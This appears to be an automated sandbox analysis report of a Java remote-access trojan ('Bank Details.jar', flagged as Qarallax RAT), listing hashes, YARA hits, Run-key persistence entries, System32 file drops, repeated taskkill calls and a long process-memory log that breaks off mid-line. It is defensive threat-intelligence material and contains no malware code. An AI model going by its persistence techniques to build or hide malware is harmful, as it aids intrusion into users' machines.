Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows7_x64 -
resource
win7 -
submitted
25-08-2020 10:24
Static task
static1
Behavioral task
behavioral1
Sample
Bank Details.jar
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Bank Details.jar
Resource
win10
0 signatures
0 seconds
General
-
Target
Bank Details.jar
-
Size
399KB
-
MD5
be78b9af89688c2cfb0be97cf90b2b82
-
SHA1
fa676fb645b4ae2ec0716b4d6efe85eacbd03617
-
SHA256
bca4b851df178e8a757d0609ae14eae486b97ec1a0693a4d92865fe8dd023d66
-
SHA512
8cd0c8718412b10cf56c10fbfa41b1dbdeda12bfcb5997f306fd7d79a781b336e10e6e61c471f75899fc24282d5f0201b75bfa65d3284959d32a3641efff8332
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001353f-7.dat qarallax_dll -
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1156 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\FVKwo\Desktop.ini java.exe File created C:\Users\Admin\FVKwo\Desktop.ini java.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\FVKwo\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\QwuIs java.exe File opened for modification C:\Windows\System32\QwuIs java.exe -
Kills process with taskkill 16 IoCs
pid Process 1628 taskkill.exe 1784 taskkill.exe 1772 taskkill.exe 1932 taskkill.exe 1384 taskkill.exe 1892 taskkill.exe 1020 taskkill.exe 1644 taskkill.exe 1956 taskkill.exe 1496 taskkill.exe 272 taskkill.exe 2016 taskkill.exe 1412 taskkill.exe 1856 taskkill.exe 812 taskkill.exe 1876 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1184 powershell.exe 1184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 97 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1896 WMIC.exe Token: SeSecurityPrivilege 1896 WMIC.exe Token: SeTakeOwnershipPrivilege 1896 WMIC.exe Token: SeLoadDriverPrivilege 1896 WMIC.exe Token: SeSystemProfilePrivilege 1896 WMIC.exe Token: SeSystemtimePrivilege 1896 WMIC.exe Token: SeProfSingleProcessPrivilege 1896 WMIC.exe Token: SeIncBasePriorityPrivilege 1896 WMIC.exe Token: SeCreatePagefilePrivilege 1896 WMIC.exe Token: SeBackupPrivilege 1896 WMIC.exe Token: SeRestorePrivilege 1896 WMIC.exe Token: SeShutdownPrivilege 1896 WMIC.exe Token: SeDebugPrivilege 1896 WMIC.exe Token: SeSystemEnvironmentPrivilege 1896 WMIC.exe Token: SeRemoteShutdownPrivilege 1896 WMIC.exe Token: SeUndockPrivilege 1896 WMIC.exe Token: SeManageVolumePrivilege 1896 WMIC.exe Token: 33 1896 WMIC.exe Token: 34 1896 WMIC.exe Token: 35 1896 WMIC.exe Token: SeIncreaseQuotaPrivilege 1896 WMIC.exe Token: SeSecurityPrivilege 1896 WMIC.exe Token: SeTakeOwnershipPrivilege 1896 WMIC.exe Token: SeLoadDriverPrivilege 1896 WMIC.exe Token: SeSystemProfilePrivilege 1896 WMIC.exe Token: SeSystemtimePrivilege 1896 WMIC.exe Token: SeProfSingleProcessPrivilege 1896 WMIC.exe Token: SeIncBasePriorityPrivilege 1896 WMIC.exe Token: SeCreatePagefilePrivilege 1896 WMIC.exe Token: SeBackupPrivilege 1896 WMIC.exe Token: SeRestorePrivilege 1896 WMIC.exe Token: SeShutdownPrivilege 1896 WMIC.exe Token: SeDebugPrivilege 1896 WMIC.exe Token: SeSystemEnvironmentPrivilege 1896 WMIC.exe Token: SeRemoteShutdownPrivilege 1896 WMIC.exe Token: SeUndockPrivilege 1896 WMIC.exe Token: SeManageVolumePrivilege 1896 WMIC.exe Token: 33 1896 WMIC.exe Token: 34 1896 WMIC.exe Token: 35 1896 WMIC.exe Token: SeIncreaseQuotaPrivilege 1944 WMIC.exe Token: SeSecurityPrivilege 1944 WMIC.exe Token: SeTakeOwnershipPrivilege 1944 WMIC.exe Token: SeLoadDriverPrivilege 1944 WMIC.exe Token: SeSystemProfilePrivilege 1944 WMIC.exe Token: SeSystemtimePrivilege 1944 WMIC.exe Token: SeProfSingleProcessPrivilege 1944 WMIC.exe Token: SeIncBasePriorityPrivilege 1944 WMIC.exe Token: SeCreatePagefilePrivilege 1944 WMIC.exe Token: SeBackupPrivilege 1944 WMIC.exe Token: SeRestorePrivilege 1944 WMIC.exe Token: SeShutdownPrivilege 1944 WMIC.exe Token: SeDebugPrivilege 1944 WMIC.exe Token: SeSystemEnvironmentPrivilege 1944 WMIC.exe Token: SeRemoteShutdownPrivilege 1944 WMIC.exe Token: SeUndockPrivilege 1944 WMIC.exe Token: SeManageVolumePrivilege 1944 WMIC.exe Token: 33 1944 WMIC.exe Token: 34 1944 WMIC.exe Token: 35 1944 WMIC.exe Token: SeIncreaseQuotaPrivilege 1944 WMIC.exe Token: SeSecurityPrivilege 1944 WMIC.exe Token: SeTakeOwnershipPrivilege 1944 WMIC.exe Token: SeLoadDriverPrivilege 1944 WMIC.exe Token: SeSystemProfilePrivilege 1944 WMIC.exe Token: SeSystemtimePrivilege 1944 WMIC.exe Token: SeProfSingleProcessPrivilege 1944 WMIC.exe Token: SeIncBasePriorityPrivilege 1944 WMIC.exe Token: SeCreatePagefilePrivilege 1944 WMIC.exe Token: SeBackupPrivilege 1944 WMIC.exe Token: SeRestorePrivilege 1944 WMIC.exe Token: SeShutdownPrivilege 1944 WMIC.exe Token: SeDebugPrivilege 1944 WMIC.exe Token: SeSystemEnvironmentPrivilege 1944 WMIC.exe Token: SeRemoteShutdownPrivilege 1944 WMIC.exe Token: SeUndockPrivilege 1944 WMIC.exe Token: SeManageVolumePrivilege 1944 WMIC.exe Token: 33 1944 WMIC.exe Token: 34 1944 WMIC.exe Token: 35 1944 WMIC.exe Token: SeDebugPrivilege 1856 taskkill.exe Token: SeDebugPrivilege 1412 taskkill.exe Token: SeDebugPrivilege 1892 taskkill.exe Token: SeDebugPrivilege 1020 taskkill.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 272 taskkill.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 1956 taskkill.exe Token: SeDebugPrivilege 1784 taskkill.exe Token: SeDebugPrivilege 1772 taskkill.exe Token: SeDebugPrivilege 812 taskkill.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeDebugPrivilege 1384 taskkill.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 1628 taskkill.exe Token: SeDebugPrivilege 1876 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1156 java.exe -
Suspicious use of WriteProcessMemory 753 IoCs
description pid Process procid_target PID 1156 wrote to memory of 1788 1156 java.exe 25 PID 1156 wrote to memory of 1788 1156 java.exe 25 PID 1156 wrote to memory of 1788 1156 java.exe 25 PID 1156 wrote to memory of 1884 1156 java.exe 26 PID 1156 wrote to memory of 1884 1156 java.exe 26 PID 1156 wrote to memory of 1884 1156 java.exe 26 PID 1884 wrote to memory of 1896 1884 cmd.exe 27 PID 1884 wrote to memory of 1896 1884 cmd.exe 27 PID 1884 wrote to memory of 1896 1884 cmd.exe 27 PID 1156 wrote to memory of 1916 1156 java.exe 28 PID 1156 wrote to memory of 1916 1156 java.exe 28 PID 1156 wrote to memory of 1916 1156 java.exe 28 PID 1916 wrote to memory of 1944 1916 cmd.exe 29 PID 1916 wrote to memory of 1944 1916 cmd.exe 29 PID 1916 wrote to memory of 1944 1916 cmd.exe 29 PID 1156 wrote to memory of 2004 1156 java.exe 30 PID 1156 wrote to memory of 2004 1156 java.exe 30 PID 1156 wrote to memory of 2004 1156 java.exe 30 PID 1156 wrote to memory of 1348 1156 java.exe 31 PID 1156 wrote to memory of 1348 1156 java.exe 31 PID 1156 wrote to memory of 1348 1156 java.exe 31 PID 1156 wrote to memory of 2008 1156 java.exe 32 PID 1156 wrote to memory of 2008 1156 java.exe 32 PID 1156 wrote to memory of 2008 1156 java.exe 32 PID 1156 wrote to memory of 1860 1156 java.exe 33 PID 1156 wrote to memory of 1860 1156 java.exe 33 PID 1156 wrote to memory of 1860 1156 java.exe 33 PID 1156 wrote to memory of 1844 1156 java.exe 34 PID 1156 wrote to memory of 1844 1156 java.exe 34 PID 1156 wrote to memory of 1844 1156 java.exe 34 PID 1156 wrote to memory of 1776 1156 java.exe 35 PID 1156 wrote to memory of 1776 1156 java.exe 35 PID 1156 wrote to memory of 1776 1156 java.exe 35 PID 1156 wrote to memory of 1672 1156 java.exe 36 PID 1156 wrote to memory of 1672 1156 java.exe 36 PID 1156 wrote to memory of 1672 1156 java.exe 36 PID 1156 wrote to memory of 1580 1156 java.exe 37 PID 1156 wrote to memory of 1580 1156 java.exe 37 PID 1156 wrote to memory of 1580 1156 java.exe 37 PID 1156 wrote to memory of 2032 1156 java.exe 38 PID 1156 wrote to memory of 2032 1156 java.exe 38 PID 1156 wrote to memory of 2032 1156 java.exe 38 PID 1156 wrote to memory of 1184 1156 java.exe 39 PID 1156 wrote to memory of 1184 1156 java.exe 39 PID 1156 wrote to memory of 1184 1156 java.exe 39 PID 1156 wrote to memory of 2028 1156 java.exe 42 PID 1156 wrote to memory of 2028 1156 java.exe 42 PID 1156 wrote to memory of 2028 1156 java.exe 42 PID 1156 wrote to memory of 2024 1156 java.exe 41 PID 1156 wrote to memory of 2024 1156 java.exe 41 PID 1156 wrote to memory of 2024 1156 java.exe 41 PID 1156 wrote to memory of 1412 1156 java.exe 43 PID 1156 wrote to memory of 1412 1156 java.exe 43 PID 1156 wrote to memory of 1412 1156 java.exe 43 PID 2032 wrote to memory of 1344 2032 cmd.exe 44 PID 2032 wrote to memory of 1344 2032 cmd.exe 44 PID 2032 wrote to memory of 1344 2032 cmd.exe 44 PID 1156 wrote to memory of 1496 1156 java.exe 47 PID 1156 wrote to memory of 1496 1156 java.exe 47 PID 1156 wrote to memory of 1496 1156 java.exe 47 PID 1156 wrote to memory of 1636 1156 java.exe 48 PID 1156 wrote to memory of 1636 1156 java.exe 48 PID 1156 wrote to memory of 1636 1156 java.exe 48 PID 1156 wrote to memory of 1660 1156 java.exe 51 PID 1156 wrote to memory of 1660 1156 java.exe 51 PID 1156 wrote to memory of 1660 1156 java.exe 51 PID 1156 wrote to memory of 1060 1156 java.exe 53 PID 1156 wrote to memory of 1060 1156 java.exe 53 PID 1156 wrote to memory of 1060 1156 java.exe 53 PID 1156 wrote to memory of 692 1156 java.exe 55 PID 1156 wrote to memory of 692 1156 java.exe 55 PID 1156 wrote to memory of 692 1156 java.exe 55 PID 1156 wrote to memory of 812 1156 java.exe 57 PID 1156 wrote to memory of 812 1156 java.exe 57 PID 1156 wrote to memory of 812 1156 java.exe 57 PID 2032 wrote to memory of 1384 2032 cmd.exe 58 PID 2032 wrote to memory of 1384 2032 cmd.exe 58 PID 2032 wrote to memory of 1384 2032 cmd.exe 58 PID 1156 wrote to memory of 1608 1156 java.exe 59 PID 1156 wrote to memory of 1608 1156 java.exe 59 PID 1156 wrote to memory of 1608 1156 java.exe 59 PID 1608 wrote to memory of 1904 1608 cmd.exe 61 PID 1608 wrote to memory of 1904 1608 cmd.exe 61 PID 1608 wrote to memory of 1904 1608 cmd.exe 61 PID 1156 wrote to memory of 1968 1156 java.exe 63 PID 1156 wrote to memory of 1968 1156 java.exe 63 PID 1156 wrote to memory of 1968 1156 java.exe 63 PID 1156 wrote to memory of 1992 1156 java.exe 64 PID 1156 wrote to memory of 1992 1156 java.exe 64 PID 1156 wrote to memory of 1992 1156 java.exe 64 PID 1608 wrote to memory of 1804 1608 cmd.exe 66 PID 1608 wrote to memory of 1804 1608 cmd.exe 66 PID 1608 wrote to memory of 1804 1608 cmd.exe 66 PID 1156 wrote to memory of 1856 1156 java.exe 68 PID 1156 wrote to memory of 1856 1156 java.exe 68 PID 1156 wrote to memory of 1856 1156 java.exe 68 PID 1156 wrote to memory of 1588 1156 java.exe 69 PID 1156 wrote to memory of 1588 1156 java.exe 69 PID 1156 wrote to memory of 1588 1156 java.exe 69 PID 1156 wrote to memory of 1576 1156 java.exe 71 PID 1156 wrote to memory of 1576 1156 java.exe 71 PID 1156 wrote to memory of 1576 1156 java.exe 71 PID 1156 wrote to memory of 628 1156 java.exe 73 PID 1156 wrote to memory of 628 1156 java.exe 73 PID 1156 wrote to memory of 628 1156 java.exe 73 PID 1156 wrote to memory of 756 1156 java.exe 75 PID 1156 wrote to memory of 756 1156 java.exe 75 PID 1156 wrote to memory of 756 1156 java.exe 75 PID 628 wrote to memory of 676 628 cmd.exe 77 PID 628 wrote to memory of 676 628 cmd.exe 77 PID 628 wrote to memory of 676 628 cmd.exe 77 PID 1156 wrote to memory of 1344 1156 java.exe 78 PID 1156 wrote to memory of 1344 1156 java.exe 78 PID 1156 wrote to memory of 1344 1156 java.exe 78 PID 1156 wrote to memory of 2020 1156 java.exe 79 PID 1156 wrote to memory of 2020 1156 java.exe 79 PID 1156 wrote to memory of 2020 1156 java.exe 79 PID 628 wrote to memory of 1920 628 cmd.exe 81 PID 628 wrote to memory of 1920 628 cmd.exe 81 PID 628 wrote to memory of 1920 628 cmd.exe 81 PID 1156 wrote to memory of 1440 1156 java.exe 83 PID 1156 wrote to memory of 1440 1156 java.exe 83 PID 1156 wrote to memory of 1440 1156 java.exe 83 PID 1156 wrote to memory of 1864 1156 java.exe 84 PID 1156 wrote to memory of 1864 1156 java.exe 84 PID 1156 wrote to memory of 1864 1156 java.exe 84 PID 1440 wrote to memory of 472 1440 cmd.exe 86 PID 1440 wrote to memory of 472 1440 cmd.exe 86 PID 1440 wrote to memory of 472 1440 cmd.exe 86 PID 1156 wrote to memory of 1504 1156 java.exe 87 PID 1156 wrote to memory of 1504 1156 java.exe 87 PID 1156 wrote to memory of 1504 1156 java.exe 87 PID 1156 wrote to memory of 1892 1156 java.exe 88 PID 1156 wrote to memory of 1892 1156 java.exe 88 PID 1156 wrote to memory of 1892 1156 java.exe 88 PID 1440 wrote to memory of 1964 1440 cmd.exe 89 PID 1440 wrote to memory of 1964 1440 cmd.exe 89 PID 1440 wrote to memory of 1964 1440 cmd.exe 89 PID 1156 wrote to memory of 1084 1156 java.exe 91 PID 1156 wrote to memory of 1084 1156 java.exe 91 PID 1156 wrote to memory of 1084 1156 java.exe 91 PID 1156 wrote to memory of 1848 1156 java.exe 92 PID 1156 wrote to memory of 1848 1156 java.exe 92 PID 1156 wrote to memory of 1848 1156 java.exe 92 PID 1156 wrote to memory of 2008 1156 java.exe 95 PID 1156 wrote to memory of 2008 1156 java.exe 95 PID 1156 wrote to memory of 2008 1156 java.exe 95 PID 1848 wrote to memory of 1776 1848 cmd.exe 96 PID 1848 wrote to memory of 1776 1848 cmd.exe 96 PID 1848 wrote to memory of 1776 1848 cmd.exe 96 PID 1156 wrote to memory of 1628 1156 java.exe 98 PID 1156 wrote to memory of 1628 1156 java.exe 98 PID 1156 wrote to memory of 1628 1156 java.exe 98 PID 1848 wrote to memory of 2012 1848 cmd.exe 100 PID 1848 wrote to memory of 2012 1848 cmd.exe 100 PID 1848 wrote to memory of 2012 1848 cmd.exe 100 PID 1156 wrote to memory of 1172 1156 java.exe 101 PID 1156 wrote to memory of 1172 1156 java.exe 101 PID 1156 wrote to memory of 1172 1156 java.exe 101 PID 1172 wrote to memory of 784 1172 cmd.exe 102 PID 1172 wrote to memory of 784 1172 cmd.exe 102 PID 1172 wrote to memory of 784 1172 cmd.exe 102 PID 1172 wrote to memory of 568 1172 cmd.exe 103 PID 1172 wrote to memory of 568 1172 cmd.exe 103 PID 1172 wrote to memory of 568 1172 cmd.exe 103 PID 1156 wrote to memory of 1548 1156 java.exe 104 PID 1156 wrote to memory of 1548 1156 java.exe 104 PID 1156 wrote to memory of 1548 1156 java.exe 104 PID 1548 wrote to memory of 1216 1548 cmd.exe 105 PID 1548 wrote to memory of 1216 1548 cmd.exe 105 PID 1548 wrote to memory of 1216 1548 cmd.exe 105 PID 1548 wrote to memory of 572 1548 cmd.exe 106 PID 1548 wrote to memory of 572 1548 cmd.exe 106 PID 1548 wrote to memory of 572 1548 cmd.exe 106 PID 1156 wrote to memory of 272 1156 java.exe 107 PID 1156 wrote to memory of 272 1156 java.exe 107 PID 1156 wrote to memory of 272 1156 java.exe 107 PID 272 wrote to memory of 308 272 cmd.exe 108 PID 272 wrote to memory of 308 272 cmd.exe 108 PID 272 wrote to memory of 308 272 cmd.exe 108 PID 272 wrote to memory of 756 272 cmd.exe 109 PID 272 wrote to memory of 756 272 cmd.exe 109 PID 272 wrote to memory of 756 272 cmd.exe 109 PID 1156 wrote to memory of 1020 1156 java.exe 111 PID 1156 wrote to memory of 1020 1156 java.exe 111 PID 1156 wrote to memory of 1020 1156 java.exe 111 PID 1156 wrote to memory of 1944 1156 java.exe 112 PID 1156 wrote to memory of 1944 1156 java.exe 112 PID 1156 wrote to memory of 1944 1156 java.exe 112 PID 1944 wrote to memory of 1920 1944 cmd.exe 113 PID 1944 wrote to memory of 1920 1944 cmd.exe 113 PID 1944 wrote to memory of 1920 1944 cmd.exe 113 PID 1944 wrote to memory of 1964 1944 cmd.exe 115 PID 1944 wrote to memory of 1964 1944 cmd.exe 115 PID 1944 wrote to memory of 1964 1944 cmd.exe 115 PID 1156 wrote to memory of 1664 1156 java.exe 116 PID 1156 wrote to memory of 1664 1156 java.exe 116 PID 1156 wrote to memory of 1664 1156 java.exe 116 PID 1664 wrote to memory of 1864 1664 cmd.exe 117 PID 1664 wrote to memory of 1864 1664 cmd.exe 117 PID 1664 wrote to memory of 1864 1664 cmd.exe 117 PID 1664 wrote to memory of 1600 1664 cmd.exe 118 PID 1664 wrote to memory of 1600 1664 cmd.exe 118 PID 1664 wrote to memory of 1600 1664 cmd.exe 118 PID 1156 wrote to memory of 1580 1156 java.exe 119 PID 1156 wrote to memory of 1580 1156 java.exe 119 PID 1156 wrote to memory of 1580 1156 java.exe 119 PID 1580 wrote to memory of 592 1580 cmd.exe 120 PID 1580 wrote to memory of 592 1580 cmd.exe 120 PID 1580 wrote to memory of 592 1580 cmd.exe 120 PID 1580 wrote to memory of 1904 1580 cmd.exe 121 PID 1580 wrote to memory of 1904 1580 cmd.exe 121 PID 1580 wrote to memory of 1904 1580 cmd.exe 121 PID 1156 wrote to memory of 1660 1156 java.exe 122 PID 1156 wrote to memory of 1660 1156 java.exe 122 PID 1156 wrote to memory of 1660 1156 java.exe 122 PID 1660 wrote to memory of 2004 1660 cmd.exe 123 PID 1660 wrote to memory of 2004 1660 cmd.exe 123 PID 1660 wrote to memory of 2004 1660 cmd.exe 123 PID 1660 wrote to memory of 1972 1660 cmd.exe 124 PID 1660 wrote to memory of 1972 1660 cmd.exe 124 PID 1660 wrote to memory of 1972 1660 cmd.exe 124 PID 1156 wrote to memory of 1788 1156 java.exe 125 PID 1156 wrote to memory of 1788 1156 java.exe 125 PID 1156 wrote to memory of 1788 1156 java.exe 125 PID 1788 wrote to memory of 1776 1788 cmd.exe 126 PID 1788 wrote to memory of 1776 1788 cmd.exe 126 PID 1788 wrote to memory of 1776 1788 cmd.exe 126 PID 1788 wrote to memory of 812 1788 cmd.exe 127 PID 1788 wrote to memory of 812 1788 cmd.exe 127 PID 1788 wrote to memory of 812 1788 cmd.exe 127 PID 1156 wrote to memory of 1652 1156 java.exe 128 PID 1156 wrote to memory of 1652 1156 java.exe 128 PID 1156 wrote to memory of 1652 1156 java.exe 128 PID 1652 wrote to memory of 360 1652 cmd.exe 129 PID 1652 wrote to memory of 360 1652 cmd.exe 129 PID 1652 wrote to memory of 360 1652 cmd.exe 129 PID 1652 wrote to memory of 1968 1652 cmd.exe 130 PID 1652 wrote to memory of 1968 1652 cmd.exe 130 PID 1652 wrote to memory of 1968 1652 cmd.exe 130 PID 1156 wrote to memory of 676 1156 java.exe 131 PID 1156 wrote to memory of 676 1156 java.exe 131 PID 1156 wrote to memory of 676 1156 java.exe 131 PID 1156 wrote to memory of 1496 1156 java.exe 132 PID 1156 wrote to memory of 1496 1156 java.exe 132 PID 1156 wrote to memory of 1496 1156 java.exe 132 PID 676 wrote to memory of 584 676 cmd.exe 133 PID 676 wrote to memory of 584 676 cmd.exe 133 PID 676 wrote to memory of 584 676 cmd.exe 133 PID 676 wrote to memory of 588 676 cmd.exe 134 PID 676 wrote to memory of 588 676 cmd.exe 134 PID 676 wrote to memory of 588 676 cmd.exe 134 PID 1156 wrote to memory of 1872 1156 java.exe 136 PID 1156 wrote to memory of 1872 1156 java.exe 136 PID 1156 wrote to memory of 1872 1156 java.exe 136 PID 1872 wrote to memory of 1912 1872 cmd.exe 137 PID 1872 wrote to memory of 1912 1872 cmd.exe 137 PID 1872 wrote to memory of 1912 1872 cmd.exe 137 PID 1872 wrote to memory of 2020 1872 cmd.exe 138 PID 1872 wrote to memory of 2020 1872 cmd.exe 138 PID 1872 wrote to memory of 2020 1872 cmd.exe 138 PID 1156 wrote to memory of 592 1156 java.exe 139 PID 1156 wrote to memory of 592 1156 java.exe 139 PID 1156 wrote to memory of 592 1156 java.exe 139 PID 592 wrote to memory of 1552 592 cmd.exe 140 PID 592 wrote to memory of 1552 592 cmd.exe 140 PID 592 wrote to memory of 1552 592 cmd.exe 140 PID 592 wrote to memory of 1784 592 cmd.exe 141 PID 592 wrote to memory of 1784 592 cmd.exe 141 PID 592 wrote to memory of 1784 592 cmd.exe 141 PID 1156 wrote to memory of 1924 1156 java.exe 142 PID 1156 wrote to memory of 1924 1156 java.exe 142 PID 1156 wrote to memory of 1924 1156 java.exe 142 PID 1924 wrote to memory of 1844 1924 cmd.exe 143 PID 1924 wrote to memory of 1844 1924 cmd.exe 143 PID 1924 wrote to memory of 1844 1924 cmd.exe 143 PID 1924 wrote to memory of 1628 1924 cmd.exe 144 PID 1924 wrote to memory of 1628 1924 cmd.exe 144 PID 1924 wrote to memory of 1628 1924 cmd.exe 144 PID 1156 wrote to memory of 1968 1156 java.exe 145 PID 1156 wrote to memory of 1968 1156 java.exe 145 PID 1156 wrote to memory of 1968 1156 java.exe 145 PID 1968 wrote to memory of 276 1968 cmd.exe 146 PID 1968 wrote to memory of 276 1968 cmd.exe 146 PID 1968 wrote to memory of 276 1968 cmd.exe 146 PID 1156 wrote to memory of 272 1156 java.exe 147 PID 1156 wrote to memory of 272 1156 java.exe 147 PID 1156 wrote to memory of 272 1156 java.exe 147 PID 1968 wrote to memory of 1084 1968 cmd.exe 149 PID 1968 wrote to memory of 1084 1968 cmd.exe 149 PID 1968 wrote to memory of 1084 1968 cmd.exe 149 PID 1156 wrote to memory of 2008 1156 java.exe 150 PID 1156 wrote to memory of 2008 1156 java.exe 150 PID 1156 wrote to memory of 2008 1156 java.exe 150 PID 2008 wrote to memory of 1672 2008 cmd.exe 151 PID 2008 wrote to memory of 1672 2008 cmd.exe 151 PID 2008 wrote to memory of 1672 2008 cmd.exe 151 PID 2008 wrote to memory of 1608 2008 cmd.exe 152 PID 2008 wrote to memory of 1608 2008 cmd.exe 152 PID 2008 wrote to memory of 1608 2008 cmd.exe 152 PID 1156 wrote to memory of 756 1156 java.exe 153 PID 1156 wrote to memory of 756 1156 java.exe 153 PID 1156 wrote to memory of 756 1156 java.exe 153 PID 756 wrote to memory of 924 756 cmd.exe 154 PID 756 wrote to memory of 924 756 cmd.exe 154 PID 756 wrote to memory of 924 756 cmd.exe 154 PID 756 wrote to memory of 1572 756 cmd.exe 155 PID 756 wrote to memory of 1572 756 cmd.exe 155 PID 756 wrote to memory of 1572 756 cmd.exe 155 PID 1156 wrote to memory of 868 1156 java.exe 156 PID 1156 wrote to memory of 868 1156 java.exe 156 PID 1156 wrote to memory of 868 1156 java.exe 156 PID 868 wrote to memory of 1584 868 cmd.exe 157 PID 868 wrote to memory of 1584 868 cmd.exe 157 PID 868 wrote to memory of 1584 868 cmd.exe 157 PID 868 wrote to memory of 308 868 cmd.exe 158 PID 868 wrote to memory of 308 868 cmd.exe 158 PID 868 wrote to memory of 308 868 cmd.exe 158 PID 1156 wrote to memory of 556 1156 java.exe 159 PID 1156 wrote to memory of 556 1156 java.exe 159 PID 1156 wrote to memory of 556 1156 java.exe 159 PID 556 wrote to memory of 1892 556 cmd.exe 160 PID 556 wrote to memory of 1892 556 cmd.exe 160 PID 556 wrote to memory of 1892 556 cmd.exe 160 PID 556 wrote to memory of 1600 556 cmd.exe 161 PID 556 wrote to memory of 1600 556 cmd.exe 161 PID 556 wrote to memory of 1600 556 cmd.exe 161 PID 1156 wrote to memory of 1644 1156 java.exe 162 PID 1156 wrote to memory of 1644 1156 java.exe 162 PID 1156 wrote to memory of 1644 1156 java.exe 162 PID 1156 wrote to memory of 1552 1156 java.exe 163 PID 1156 wrote to memory of 1552 1156 java.exe 163 PID 1156 wrote to memory of 1552 1156 java.exe 163 PID 1552 wrote to memory of 1456 1552 cmd.exe 165 PID 1552 wrote to memory of 1456 1552 cmd.exe 165 PID 1552 wrote to memory of 1456 1552 cmd.exe 165 PID 1552 wrote to memory of 1128 1552 cmd.exe 166 PID 1552 wrote to memory of 1128 1552 cmd.exe 166 PID 1552 wrote to memory of 1128 1552 cmd.exe 166 PID 1156 wrote to memory of 1776 1156 java.exe 167 PID 1156 wrote to memory of 1776 1156 java.exe 167 PID 1156 wrote to memory of 1776 1156 java.exe 167 PID 1776 wrote to memory of 2004 1776 cmd.exe 168 PID 1776 wrote to memory of 2004 1776 cmd.exe 168 PID 1776 wrote to memory of 2004 1776 cmd.exe 168 PID 1776 wrote to memory of 816 1776 cmd.exe 169 PID 1776 wrote to memory of 816 1776 cmd.exe 169 PID 1776 wrote to memory of 816 1776 cmd.exe 169 PID 1156 wrote to memory of 2036 1156 java.exe 170 PID 1156 wrote to memory of 2036 1156 java.exe 170 PID 1156 wrote to memory of 2036 1156 java.exe 170 PID 2036 wrote to memory of 280 2036 cmd.exe 171 PID 2036 wrote to memory of 280 2036 cmd.exe 171 PID 2036 wrote to memory of 280 2036 cmd.exe 171 PID 2036 wrote to memory of 1880 2036 cmd.exe 172 PID 2036 wrote to memory of 1880 2036 cmd.exe 172 PID 2036 wrote to memory of 1880 2036 cmd.exe 172 PID 1156 wrote to memory of 1952 1156 java.exe 173 PID 1156 wrote to memory of 1952 1156 java.exe 173 PID 1156 wrote to memory of 1952 1156 java.exe 173 PID 1952 wrote to memory of 1664 1952 cmd.exe 174 PID 1952 wrote to memory of 1664 1952 cmd.exe 174 PID 1952 wrote to memory of 1664 1952 cmd.exe 174 PID 1952 wrote to memory of 1964 1952 cmd.exe 175 PID 1952 wrote to memory of 1964 1952 cmd.exe 175 PID 1952 wrote to memory of 1964 1952 cmd.exe 175 PID 1156 wrote to memory of 472 1156 java.exe 176 PID 1156 wrote to memory of 472 1156 java.exe 176 PID 1156 wrote to memory of 472 1156 java.exe 176 PID 1156 wrote to memory of 1956 1156 java.exe 177 PID 1156 wrote to memory of 1956 1156 java.exe 177 PID 1156 wrote to memory of 1956 1156 java.exe 177 PID 472 wrote to memory of 1944 472 cmd.exe 179 PID 472 wrote to memory of 1944 472 cmd.exe 179 PID 472 wrote to memory of 1944 472 cmd.exe 179 PID 472 wrote to memory of 1672 472 cmd.exe 180 PID 472 wrote to memory of 1672 472 cmd.exe 180 PID 472 wrote to memory of 1672 472 cmd.exe 180 PID 1156 wrote to memory of 1864 1156 java.exe 181 PID 1156 wrote to memory of 1864 1156 java.exe 181 PID 1156 wrote to memory of 1864 1156 java.exe 181 PID 1864 wrote to memory of 628 1864 cmd.exe 182 PID 1864 wrote to memory of 628 1864 cmd.exe 182 PID 1864 wrote to memory of 628 1864 cmd.exe 182 PID 1864 wrote to memory of 1440 1864 cmd.exe 183 PID 1864 wrote to memory of 1440 1864 cmd.exe 183 PID 1864 wrote to memory of 1440 1864 cmd.exe 183 PID 1156 wrote to memory of 924 1156 java.exe 184 PID 1156 wrote to memory of 924 1156 java.exe 184 PID 1156 wrote to memory of 924 1156 java.exe 184 PID 924 wrote to memory of 1676 924 cmd.exe 185 PID 924 wrote to memory of 1676 924 cmd.exe 185 PID 924 wrote to memory of 1676 924 cmd.exe 185 PID 924 wrote to memory of 1576 924 cmd.exe 186 PID 924 wrote to memory of 1576 924 cmd.exe 186 PID 924 wrote to memory of 1576 924 cmd.exe 186 PID 1156 wrote to memory of 1584 1156 java.exe 187 PID 1156 wrote to memory of 1584 1156 java.exe 187 PID 1156 wrote to memory of 1584 1156 java.exe 187 PID 1584 wrote to memory of 1804 1584 cmd.exe 188 PID 1584 wrote to memory of 1804 1584 cmd.exe 188 PID 1584 wrote 